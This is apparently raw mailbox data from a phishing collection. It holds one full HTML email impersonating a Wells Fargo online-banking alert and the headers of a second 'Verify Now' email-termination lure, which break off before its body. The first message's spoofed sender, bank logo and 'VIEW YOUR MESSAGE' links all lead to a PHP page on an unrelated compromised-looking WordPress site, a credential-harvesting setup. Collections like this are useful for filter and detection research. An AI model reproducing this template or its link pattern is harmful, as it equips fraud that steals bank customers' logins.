From: =?UTF-8?Q?Wells_Fargo_Online_Banking?= <alerts@notify.wellsfargo.com>
Subject: =?UTF-8?Q?Messages_=26_Alerts=3a_=31_new_message?=
Message-ID: <f1811c81f3c26ee8535a5586d966ee60@www.podlogifraczak.pl>
X-Priority: 3
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset="us-ascii"
X-HTTP-Posting-URI: http://www.podlogifraczak.pl:80/img/maszyny/gallery/min/chiko.php
X-HTTP-Client: 120.140.74.71
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 173

<html>

<head>
<meta http-equiv=3D"Content-Language" content=3D"en-us">
<meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0">
<meta name=3D"ProgId" content=3D"FrontPage.Editor.Document">
<meta http-equiv=3D"Content-Type" content=3D"text/html;=20

charset=3Dwindows-1252">
<title>New Page 2</title>
</head>

<body>

<table style=3D"width:600px;border-top:4px solid #dddece;border-

bottom:1px solid #999" cellpadding=3D"0" cellspacing=3D"0">
  <tr>
    <td style=3D"width:62px">
    <a accesskey=3D"M" class=3D"headerLink"=20

href=3D"https://encrypted-tbn0.gstatic.com/images?

q=3Dtbn:ANd9GcSO7j82grcXPrllBMhmKNgmDj5QwcP-6BVM2NLv33FtH-

4Na_aEtQ">
    <img id=3D"logo" class=3D"inline" alt=3D"Wells fargo Home Page"=20

src=3D"https://a248.e.akamai.net/7/248/3608/bb61162e7a787f/online

-static.wellsfargo.com/common/images/logo_62sq.gif" border=3D"0"=20

width=3D"120" height=3D"80"></a>
    <div id=3D"utility" class=3D"noprint">
      <a id=3D"securityguarantee" class=3D"prominentNavLinks"=20

href=3D"https://www.Wells Fargo Online/security/security_olb">
      OnlineSecurityGuarantee</a></div>
    </td>
    <td style=3D"padding-right:5px;text-align:right;vertical-

align:top;font-family:arial,helvetica,sans-serif;font-

size:12px">
    <a href=3D"https://www.Wells Fargo Online" style=3D"font-

size:12px;font-family:arial,helvetica,sans-serif;color:#336699"=20

target=3D"_blank">
    <strong>Wells Fargo Online</strong></a></td>
  </tr>
</table>
<p>=A0</p>
<table style=3D"width:600px;font-family:arial,helvetica,sans-

serif;font-size:12px" border=3D"0" cellpadding=3D"0"=20

cellspacing=3D"0">
  <tr>
    <td>
    <font=3D"verdana"><b>Dear Customer,</b></font=3D"verdana"><p>
    <font=3D"verdana" size=3D"2"><b><br>
    You Have One Unread Message In Your Online Banking Account=20

</b>
    </font=3D"verdana">
    </p>
    <b>
    <p><font face=3D"Verdana" size=3D"1">
    <a href=3D"http://reubenkirkham.com/wp-

includes/fonts/wellsfargo-online.php" target=3D"_blank">VIEW YOUR=20
    MESSAGE</a></font> </p>
    </b>
    <div style=3D"margin:16px 0 12px 0;padding:3px 0 3px=20

10px;background-color:#f7f8f3;border-top:1px solid=20

#b3b2b2;border-bottom:1px solid #b3b2b2;vertical-align:top">
      <a href=3D"http://reubenkirkham.com/wp-

includes/fonts/wellsfargo-online.php" style=3D"font-

size:12px;font-family:arial,helvetica,sans-serif;color:#336699"=20

target=3D"_blank">
      <strong>Wells Fargo Online</strong></a> |
      <a href=3D"http://reubenkirkham.com/wp-

includes/fonts/wellsfargo-online.php" style=3D"font-

size:12px;font-family:arial,helvetica,sans-serif;color:#336699"=20

target=3D"_blank">
      Fraud Information Center</a></div>
    <div style=3D"padding-left:10px;font-size:11px;margin-

bottom:15px;color:#666">
      Note: If you use Bill Pay, you will need to update your=20

contact=20
      information for that service separately. You'll find a=20

link on the right=20
      side of the Update Your Contact Information screen.</div>
    <div style=3D"padding-left:10px;font-size:11px;margin-

bottom:15px;color:#666">
      C625861B697268A8E0440021283BC0<wbr>44=A0=A0</div>
    </wbr>
    </td>
  </tr>
</table>
<p>=A0</p>

</body>

</html>

From MAILER-DAEMON  Wed Sep 16 05:22:58 2015
Return-Path: <>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id E3AD5F4106
	for <jose@login.monkey.org>; Wed, 16 Sep 2015 05:22:57 -0500 (CDT)
Received: from smtpin18.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay01.b.hostedemail.com (Postfix) with SMTP id A1EE734E370
	for <jose@login.monkey.org>; Wed, 16 Sep 2015 10:22:57 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70638718794.18.note99_8e303f6beab62
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,0,0,45b58213fbd4b8b8,d41d8cd98f00b204,,:,RULES_HIT:41:72:355:379:495:800:962:966:967:973:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1431:1436:1437:1516:1517:1518:1534:1541:1575:1588:1589:1592:1594:1711:1714:1730:1777:1792:2107:2196:2198:2199:2200:2525:2560:2563:2682:2685:2693:2859:2890:2899:2903:2914:2915:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3350:3865:3866:3867:3868:3870:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4365:4385:4552:4641:5007:6261:6650:7652:7809:8603:8784:9025:9149:9388:9416:9873:9908:10004:10214:10346:10400:10411:10416:11658:11914:12043:12517:12519:12658:12661:13025:13132:13139:13163:13199:13229:13231:13235:13237:13846:14094:14096:21060:21080,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:hu,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0
X-HE-Tag: note99_8e303f6beab62
X-Filterd-Recvd-Size: 4098
Received: from smtp.maishawireless.co.tz (unknown [41.79.69.26])
	by imf26.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 16 Sep 2015 10:22:56 +0000 (UTC)
Received: by smtp.maishawireless.co.tz (Postfix, from userid 1001)
	id D533C16EB8; Tue, 15 Sep 2015 00:24:39 +0300 (EAT)
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	smtp.maishawireless.co.tz
X-Spam-Level: ****
X-Spam-Status: No, score=4.8 required=10.0 tests=FROM_NO_USER,HTML_MESSAGE,
	MISSING_MID,TO_IN_SUBJ,URIBL_BLOCKED,URI_WP_HACKED_2 autolearn=no
	autolearn_force=no version=3.4.0
Received: from alpha.kilihost.com (alpha.kilihost.com [67.225.129.56])
	by smtp.maishawireless.co.tz (Postfix) with ESMTPS id F2B3A16EC6
	for <jose@monkey.org>; Tue, 15 Sep 2015 00:24:38 +0300 (EAT)
Received: from [197.242.102.39] (port=58758 helo=[192.168.8.100])
	by alpha.kilihost.com with esmtpsa (TLSv1:DHE-RSA-AES256-SHA:256)
	(Exim 4.85)
	id 1ZbbKx-0001b2-6j
	for jose@monkey.org; Mon, 14 Sep 2015 17:30:56 -0400
Content-Type: multipart/alternative; boundary="===============0390178096=="
MIME-Version: 1.0
Subject: Termination of E-mail jose@monkey.org Been Processed Verify Now
To: jose@monkey.org
